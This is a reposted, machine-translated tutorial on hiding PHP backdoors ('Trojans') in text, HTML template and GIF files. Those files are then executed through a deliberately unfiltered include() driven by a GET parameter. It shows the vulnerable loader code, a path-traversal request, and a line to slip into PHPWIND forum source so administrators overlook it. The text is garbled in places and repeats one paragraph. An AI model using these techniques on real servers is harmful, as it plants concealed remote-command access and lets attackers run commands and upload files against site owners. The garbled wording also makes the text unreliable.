Security Basics: PHP backdoor hiding skills test report

Source: Internet
Author: User
There may be some gaps with the expected results. The actual command has been run, but the returned results are not visible. because this is a real GIF file, the returned results are not displayed, to verify whether the command is actually executed, we perform the file upload command. As expected, the file has been successfully uploaded to the server. The advantage of this fabricated scheme is that it has good hiding ability. Not to mention the problem. If you want to see the returned results, take out the notebook.

Recently, many of my friends have asked me if I can hide my Trojan horse in HTML or images. I have inserted a Trojan horse into the php file, if you want to put it in an HTML file or image, read this test report. You need to know that if you put the PHP statement in the image, it cannot be executed in any way, because PHP only parses and expands the file named php. Therefore, PHP statements hidden in images must be executed. We use the PHP call functions such as include and require.

We still remember the articles that used to hide Trojans from pictures a few days ago. You can also use statements such as include('x.gif ') in the PHP file to call the Trojan statement hiding in the image. The statements in ASP are similar. It seems very hidden, but it is not difficult to create suspicious things for people who know PHP a little bit. Because the GET method in the URL is difficult to pass parameters, the performance of the inserted Trojan is not displayed.

The Include function is frequently used in PHP, so there are too many security titles. for example, the PHPWIND1.36 vulnerability is caused by no filtering of variables after include. Therefore, we can insert statements similar to the structure into the php file. Then, you can hide the Trojan horse in an image or HTML file, so that hiding is higher. For example, insert the following statement in the PHPWIND Forum: <''? @ Include includ/. $ PHPWIND_ROOT ;? > Generally, it cannot be seen by administrators.

With the include function, we can hide the PHP Trojan in many types of files, such as txt, html, and image files. Since txt, html, and image files are the most common in forums and document systems, we will test them in sequence.

First, create a php file test. php with the following content:

$ Test = $ _ GET ['test'];

@ Include 'test/'. $ test;

?>

Txt files are usually clarification files, so we can put a Trojan in the clarification file of the Directory. Create a txt file t.txt. We paste the scripts to the t.txt file. Then visit http: // localhost/test. php? Test = ../t.txt. if you see the t.txt content, it confirms OK, and then adds the Trojan address of the micro PHP backdoor client in lanker to http: // localhost/test. php? Add cmd to the password "test = ../t.txt". you can see all the results returned by performing the command.

HTML files are generally template files. In order to enable the Trojan horse inserted into the HTML file to be called and executed and not displayed, we can add a text box with hidden attributes in HTML, for example, and then use the same method as above. Generally, you can view the source file for the returned results. For example, you can view the efficacy of the program directory in the application. View the source file. The Directory C: \ Uniserver2_7s \ www \ test is displayed.

Next, let's talk about image files. the most poisonous way is to hide Trojans in images. We can compile an image directly and insert it to the end of the image.

Generally, the image is not affected by tests. Add the client Trojan address in the same way.

We can see that the result returned by the PHP environment variable is the original image.

There may be some gaps with the expected results. The actual command has been run, but the returned results are not visible. because this is a real GIF file, the returned results are not displayed, to verify whether the command is actually executed, we perform the file upload command. As expected, the file has been successfully uploaded to the server. The advantage of this fabricated scheme is that it has good hiding ability. Not to mention the problem. If you want to see the returned results, create a fake image file with your notepad.

Now the basic test is complete. it depends on your choice to hide the PHP backdoor. This article has been promoted. if anything is inappropriate, please point it out!

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.